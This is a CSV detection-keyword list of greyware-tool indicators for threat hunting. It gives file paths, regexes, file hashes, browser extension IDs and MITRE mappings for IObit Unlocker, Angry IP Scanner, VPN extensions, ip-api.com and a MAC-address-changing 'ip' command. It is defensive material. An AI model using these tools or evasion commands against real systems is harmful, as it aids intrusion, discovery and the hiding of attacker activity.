"*\AppData\Local\Temp\*\IObitUnlockerSetup*",".{0,1000}\\AppData\\Local\\Temp\\.{0,1000}\\IObitUnlockerSetup.{0,1000}","greyware_tool_keyword","IObitUnlocker","unlocking locked files on Windows systems","T1222 - T1070 - T1485","TA0005 - TA0040","N/A","PLAY","Defense Evasion","https://www.iobit.com/en/iobit-unlocker.php#","1","0","N/A","often used legitimatly - admin tool","5","9","N/A","N/A","N/A","N/A"
"*\Application Data\IObit\IObit Unlocker*",".{0,1000}\\Application\sData\\IObit\\IObit\sUnlocker.{0,1000}","greyware_tool_keyword","IObitUnlocker","unlocking locked files on Windows systems","T1222 - T1070 - T1485","TA0005 - TA0040","N/A","PLAY","Defense Evasion","https://www.iobit.com/en/iobit-unlocker.php#","1","0","N/A","often used legitimatly - admin tool","5","9","N/A","N/A","N/A","N/A"
"*\Downloads\IObitUnlockerSetup*",".{0,1000}\\Downloads\\IObitUnlockerSetup.{0,1000}","greyware_tool_keyword","IObitUnlocker","unlocking locked files on Windows systems","T1222 - T1070 - T1485","TA0005 - TA0040","N/A","PLAY","Defense Evasion","https://www.iobit.com/en/iobit-unlocker.php#","1","0","N/A","often used legitimatly - admin tool","5","9","N/A","N/A","N/A","N/A"
"*\IObit Unlocker.lnk*",".{0,1000}\\IObit\sUnlocker\.lnk.{0,1000}","greyware_tool_keyword","IObitUnlocker","unlocking locked files on Windows systems","T1222 - T1070 - T1485","TA0005 - TA0040","N/A","PLAY","Defense Evasion","https://www.iobit.com/en/iobit-unlocker.php#","1","0","N/A","often used legitimatly - admin tool","5","9","N/A","N/A","N/A","N/A"
"*\IObitUnlocker.dll*",".{0,1000}\\IObitUnlocker\.dll.{0,1000}","greyware_tool_keyword","IObitUnlocker","unlocking locked files on Windows systems","T1222 - T1070 - T1485","TA0005 - TA0040","N/A","PLAY","Defense Evasion","https://www.iobit.com/en/iobit-unlocker.php#","1","0","N/A","often used legitimatly - admin tool","5","9","N/A","N/A","N/A","N/A"
"*\IObitUnlocker.exe*",".{0,1000}\\IObitUnlocker\.exe.{0,1000}","greyware_tool_keyword","IObitUnlocker","unlocking locked files on Windows systems","T1222 - T1070 - T1485","TA0005 - TA0040","N/A","PLAY","Defense Evasion","https://www.iobit.com/en/iobit-unlocker.php#","1","0","N/A","often used legitimatly - admin tool","5","9","N/A","N/A","N/A","N/A"
"*\IObitUnlocker.ini*",".{0,1000}\\IObitUnlocker\.ini.{0,1000}","greyware_tool_keyword","IObitUnlocker","unlocking locked files on Windows systems","T1222 - T1070 - T1485","TA0005 - TA0040","N/A","PLAY","Defense Evasion","https://www.iobit.com/en/iobit-unlocker.php#","1","0","N/A","often used legitimatly - admin tool","5","9","N/A","N/A","N/A","N/A"
"*\IObitUnlocker.log*",".{0,1000}\\IObitUnlocker\.log.{0,1000}","greyware_tool_keyword","IObitUnlocker","unlocking locked files on Windows systems","T1222 - T1070 - T1485","TA0005 - TA0040","N/A","PLAY","Defense Evasion","https://www.iobit.com/en/iobit-unlocker.php#","1","0","N/A","often used legitimatly - admin tool","5","9","N/A","N/A","N/A","N/A"
"*\IObitUnlockerExtension.dll*",".{0,1000}\\IObitUnlockerExtension\.dll.{0,1000}","greyware_tool_keyword","IObitUnlocker","unlocking locked files on Windows systems","T1222 - T1070 - T1485","TA0005 - TA0040","N/A","PLAY","Defense Evasion","https://www.iobit.com/en/iobit-unlocker.php#","1","0","N/A","often used legitimatly - admin tool","5","9","N/A","N/A","N/A","N/A"
"*\Program Files (x86)\IObit\IObit Unlocker*",".{0,1000}\\Program\sFiles\s\(x86\)\\IObit\\IObit\sUnlocker.{0,1000}","greyware_tool_keyword","IObitUnlocker","unlocking locked files on Windows systems","T1222 - T1070 - T1485","TA0005 - TA0040","N/A","PLAY","Defense Evasion","https://www.iobit.com/en/iobit-unlocker.php#","1","0","N/A","often used legitimatly - admin tool","5","9","N/A","N/A","N/A","N/A"
"*\Program Files\IObit\IObit Unlocker*",".{0,1000}\\Program\sFiles\\IObit\\IObit\sUnlocker.{0,1000}","greyware_tool_keyword","IObitUnlocker","unlocking locked files on Windows systems","T1222 - T1070 - T1485","TA0005 - TA0040","N/A","PLAY","Defense Evasion","https://www.iobit.com/en/iobit-unlocker.php#","1","0","N/A","often used legitimatly - admin tool","5","9","N/A","N/A","N/A","N/A"
"*\Uninstall IObit Unlocker.lnk*",".{0,1000}\\Uninstall\sIObit\sUnlocker\.lnk.{0,1000}","greyware_tool_keyword","IObitUnlocker","unlocking locked files on Windows systems","T1222 - T1070 - T1485","TA0005 - TA0040","N/A","PLAY","Defense Evasion","https://www.iobit.com/en/iobit-unlocker.php#","1","0","N/A","often used legitimatly - admin tool","5","9","N/A","N/A","N/A","N/A"
"*\Uninstall IObit Unlocker.url*",".{0,1000}\\Uninstall\sIObit\sUnlocker\.url.{0,1000}","greyware_tool_keyword","IObitUnlocker","unlocking locked files on Windows systems","T1222 - T1070 - T1485","TA0005 - TA0040","N/A","PLAY","Defense Evasion","https://www.iobit.com/en/iobit-unlocker.php#","1","0","N/A","often used legitimatly - admin tool","5","9","N/A","N/A","N/A","N/A"
"*\Unlocker.exe*",".{0,1000}\\Unlocker\.exe.{0,1000}","greyware_tool_keyword","IObitUnlocker","unlocking locked files on Windows systems","T1222 - T1070 - T1485","TA0005 - TA0040","N/A","PLAY","Defense Evasion","https://www.iobit.com/en/iobit-unlocker.php#","1","0","N/A","often used legitimatly - admin tool","5","9","N/A","N/A","N/A","N/A"
"*\unlocker-setup (1).exe*",".{0,1000}\\unlocker\-setup\s\(1\)\.exe.{0,1000}","greyware_tool_keyword","IObitUnlocker","unlocking locked files on Windows systems","T1222 - T1070 - T1485","TA0005 - TA0040","N/A","PLAY","Defense Evasion","https://www.iobit.com/en/iobit-unlocker.php#","1","0","N/A","often used legitimatly - admin tool","5","9","N/A","N/A","N/A","N/A"
"*\unlocker-setup.exe*",".{0,1000}\\unlocker\-setup\.exe.{0,1000}","greyware_tool_keyword","IObitUnlocker","unlocking locked files on Windows systems","T1222 - T1070 - T1485","TA0005 - TA0040","N/A","PLAY","Defense Evasion","https://www.iobit.com/en/iobit-unlocker.php#","1","0","N/A","often used legitimatly - admin tool","5","9","N/A","N/A","N/A","N/A"
"*\unlocker-setup.tmp*",".{0,1000}\\unlocker\-setup\.tmp.{0,1000}","greyware_tool_keyword","IObitUnlocker","unlocking locked files on Windows systems","T1222 - T1070 - T1485","TA0005 - TA0040","N/A","PLAY","Defense Evasion","https://www.iobit.com/en/iobit-unlocker.php#","1","0","N/A","often used legitimatly - admin tool","5","9","N/A","N/A","N/A","N/A"
"*2efdffd1cf3adab21ff760f009d8893d8c4cbcf63b2c3bfcc1139457c9cd430b*",".{0,1000}2efdffd1cf3adab21ff760f009d8893d8c4cbcf63b2c3bfcc1139457c9cd430b.{0,1000}","greyware_tool_keyword","IObitUnlocker","unlocking locked files on Windows systems","T1222 - T1070 - T1485","TA0005 - TA0040","N/A","PLAY","Defense Evasion","https://www.iobit.com/en/iobit-unlocker.php#","1","0","#filehash","often used legitimatly - admin tool","5","9","N/A","N/A","N/A","N/A"
"*http://update.iobit.com/infofiles/iobitunlocker.upt*",".{0,1000}http\:\/\/update\.iobit\.com\/infofiles\/iobitunlocker\.upt.{0,1000}","greyware_tool_keyword","IObitUnlocker","unlocking locked files on Windows systems","T1222 - T1070 - T1485","TA0005 - TA0040","N/A","PLAY","Defense Evasion","https://www.iobit.com/en/iobit-unlocker.php#","1","1","N/A","often used legitimatly - admin tool","5","9","N/A","N/A","N/A","N/A"
"*https://silentbreaksecurity.com/adaptive-dll-hijacking*",".{0,1000}https\:\/\/silentbreaksecurity\.com\/adaptive\-dll\-hijacking.{0,1000}","greyware_tool_keyword","IObitUnlocker","unlocking locked files on Windows systems","T1222 - T1070 - T1485","TA0005 - TA0040","N/A","PLAY","Defense Evasion","https://www.iobit.com/en/iobit-unlocker.php#","1","1","N/A","often used legitimatly - admin tool","5","9","N/A","N/A","N/A","N/A"
"*IObitUnlocker.sys*",".{0,1000}IObitUnlocker\.sys.{0,1000}","greyware_tool_keyword","IObitUnlocker","unlocking locked files on Windows systems","T1222 - T1070 - T1485","TA0005 - TA0040","N/A","PLAY","Defense Evasion","https://www.iobit.com/en/iobit-unlocker.php#","1","0","N/A","often used legitimatly - admin tool","5","9","N/A","N/A","N/A","N/A"
"*ip l set dev * address *:*:*",".{0,1000}ip\sl\sset\sdev\s.{0,1000}\saddress\s.{0,1000}\:.{0,1000}\:.{0,1000}","greyware_tool_keyword","ip","changing mac address with ip","T1497.001 - T1036.004 - T1059.001","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","5","10","N/A","N/A","N/A","N/A"
"*lochiccbgeohimldjooaakjllnafhaid*",".{0,1000}lochiccbgeohimldjooaakjllnafhaid.{0,1000}","greyware_tool_keyword","IP Unblock","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"*www.ip-api.com*",".{0,1000}www\.ip\-api\.com.{0,1000}","greyware_tool_keyword","ip-api.com","get public ip address","T1016 - T1071.001","TA0005 - TA0002","N/A","Volt Typhoon","Reconnaissance","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","1","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"*kchocjcihdgkoplngjemhpplmmloanja*",".{0,1000}kchocjcihdgkoplngjemhpplmmloanja.{0,1000}","greyware_tool_keyword","IPBurger Proxy & VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"* -jar ipscan.exe*",".{0,1000}\s\-jar\sipscan\.exe.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","N/A","network exploitation tool","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*/AppFiles/ipscan.exe*",".{0,1000}\/AppFiles\/ipscan\.exe.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","N/A","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*/ipscan.exe*",".{0,1000}\/ipscan\.exe.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","1","N/A","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*/ipscan.git*",".{0,1000}\/ipscan\.git.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","1","N/A","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*/ipscan_*_amd64.deb*",".{0,1000}\/ipscan_.{0,1000}_amd64\.deb.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","N/A","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*/ipscan2-binary/*.exe*",".{0,1000}\/ipscan2\-binary\/.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","N/A","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*/ipscan-any-*.jar*",".{0,1000}\/ipscan\-any\-.{0,1000}\.jar.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","N/A","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*\Angry IP Scanner.app*",".{0,1000}\\Angry\sIP\sScanner\.app.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","N/A","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*\ipscan-*-setup.exe*",".{0,1000}\\ipscan\-.{0,1000}\-setup\.exe.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","N/A","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*\ipscan.exe*",".{0,1000}\\ipscan\.exe.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","N/A","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*\ipscan221.exe*",".{0,1000}\\ipscan221\.exe.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","N/A","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*\ipscan-crash.txt*",".{0,1000}\\ipscan\-crash\.txt.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","N/A","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*00d223d61d1569d44bfe81805359f94c15c9549473762016605287c31733bae6*",".{0,1000}00d223d61d1569d44bfe81805359f94c15c9549473762016605287c31733bae6.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*00e3b8a6e650a206a6070be87c2c1d5387c21f9f6b80d18ee683c2c0f5fd2fe5*",".{0,1000}00e3b8a6e650a206a6070be87c2c1d5387c21f9f6b80d18ee683c2c0f5fd2fe5.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*02737dd93d82d2cc1e46914a3650dde655c34e68b6f2038039bff29bb2ec382a*",".{0,1000}02737dd93d82d2cc1e46914a3650dde655c34e68b6f2038039bff29bb2ec382a.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*02d7942d0d329dd9b3df2425926bbc8cb634e416b4482fdee73e5aa4e60e00da*",".{0,1000}02d7942d0d329dd9b3df2425926bbc8cb634e416b4482fdee73e5aa4e60e00da.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*02e2cdb9266754c45c205c199b3478e372c234d6a048a2719796bdb8d3ac2731*",".{0,1000}02e2cdb9266754c45c205c199b3478e372c234d6a048a2719796bdb8d3ac2731.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*04844b7aee9a823f89337a62f63b36eef9f250d8b0b6ba151117de798e3d7454*",".{0,1000}04844b7aee9a823f89337a62f63b36eef9f250d8b0b6ba151117de798e3d7454.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*0512029520eaea2237833ed86b40aadb61ab98861da8c135dfc513524f74a4bc*",".{0,1000}0512029520eaea2237833ed86b40aadb61ab98861da8c135dfc513524f74a4bc.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*0522e7c0979e1598e40817e5d7a4bc05fd7448115237bd883c91f954ce3817a2*",".{0,1000}0522e7c0979e1598e40817e5d7a4bc05fd7448115237bd883c91f954ce3817a2.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*057519a7348a5e04eef59aafbeddcffe8f2027e76e141160a147292e24017d88*",".{0,1000}057519a7348a5e04eef59aafbeddcffe8f2027e76e141160a147292e24017d88.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*060978f4ecf406020b835643e9995ce4e33be8bcdbfc17e82781c8858fb3f971*",".{0,1000}060978f4ecf406020b835643e9995ce4e33be8bcdbfc17e82781c8858fb3f971.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*0676d3458ff6562c5b7fb3229fa9b9fa02e055ea773ce8ecbe45c4f01c43febb*",".{0,1000}0676d3458ff6562c5b7fb3229fa9b9fa02e055ea773ce8ecbe45c4f01c43febb.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*06c6c311f542cc48cf6f40e6f7d7a8769d933841aa1a5a532fca7015d14017b3*",".{0,1000}06c6c311f542cc48cf6f40e6f7d7a8769d933841aa1a5a532fca7015d14017b3.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*07c379cc290a52b11493d1edf234b842d2640963ba258b21b8cd16ad082d568e*",".{0,1000}07c379cc290a52b11493d1edf234b842d2640963ba258b21b8cd16ad082d568e.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*087a45762e1d7760cb0a52f74e797ece192cf338a1c090c198733bd5a6166bcc*",".{0,1000}087a45762e1d7760cb0a52f74e797ece192cf338a1c090c198733bd5a6166bcc.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*09c5de00c5304e6f2b2e3f031202fa6175748a451cb4e7d8c7c122ad2736f215*",".{0,1000}09c5de00c5304e6f2b2e3f031202fa6175748a451cb4e7d8c7c122ad2736f215.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*09c97fef43a054ad611912d81971b8e58395bfda3d280ef8242c74fcec0c63ea*",".{0,1000}09c97fef43a054ad611912d81971b8e58395bfda3d280ef8242c74fcec0c63ea.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*0a15c94da1d3260464b1fb81195631f9c336471090aba0989424c75a02d4d91a*",".{0,1000}0a15c94da1d3260464b1fb81195631f9c336471090aba0989424c75a02d4d91a.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*0a4958c4b72f0ec7aac3a9601675737d1ae3bdf80063e2997a99d5b3ffd45295*",".{0,1000}0a4958c4b72f0ec7aac3a9601675737d1ae3bdf80063e2997a99d5b3ffd45295.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*0b65b97063a6a2342da20ec4779b189bad3753dc596f7e79e72021fa17e20bab*",".{0,1000}0b65b97063a6a2342da20ec4779b189bad3753dc596f7e79e72021fa17e20bab.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*0b7ff7dec2fdc2d87ef6837cbc2fdde8753da066959c78a99d1c508d1037b926*",".{0,1000}0b7ff7dec2fdc2d87ef6837cbc2fdde8753da066959c78a99d1c508d1037b926.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*0c1ce0a85821e71d41b86deb8b16f43fe5150c376b3eb8de93979ead13bd57f6*",".{0,1000}0c1ce0a85821e71d41b86deb8b16f43fe5150c376b3eb8de93979ead13bd57f6.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*0cd720bb196cf0e2025f393effe11cb888cf4a069add5b0ffa7cbf73635d1de3*",".{0,1000}0cd720bb196cf0e2025f393effe11cb888cf4a069add5b0ffa7cbf73635d1de3.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*0f49299cf3e23fa2b1c5f0f1869a8982cdde2613742508d81a901a4e52ef37fa*",".{0,1000}0f49299cf3e23fa2b1c5f0f1869a8982cdde2613742508d81a901a4e52ef37fa.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*0fd4612b5f3adcd0d1a9afbcda38955ed3ce0e4eff1a7afdec9953700926c29e*",".{0,1000}0fd4612b5f3adcd0d1a9afbcda38955ed3ce0e4eff1a7afdec9953700926c29e.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*102c6bc06ee275f6d3fb46d3d48e71b92abf2b7451e682749cbcae61e4791e05*",".{0,1000}102c6bc06ee275f6d3fb46d3d48e71b92abf2b7451e682749cbcae61e4791e05.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*10562b3a636cb93258959e76fa52708108f65e58287e909f4c041839df5863bd*",".{0,1000}10562b3a636cb93258959e76fa52708108f65e58287e909f4c041839df5863bd.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*1222d5ac68ab90dfcb14e3c2e2258d695de12b27d3aadbbd94aa85a3a85d4701*",".{0,1000}1222d5ac68ab90dfcb14e3c2e2258d695de12b27d3aadbbd94aa85a3a85d4701.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*15c549c4a529d14185633144bd53bffa7d79d84916756cefa267071bf6871cfe*",".{0,1000}15c549c4a529d14185633144bd53bffa7d79d84916756cefa267071bf6871cfe.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
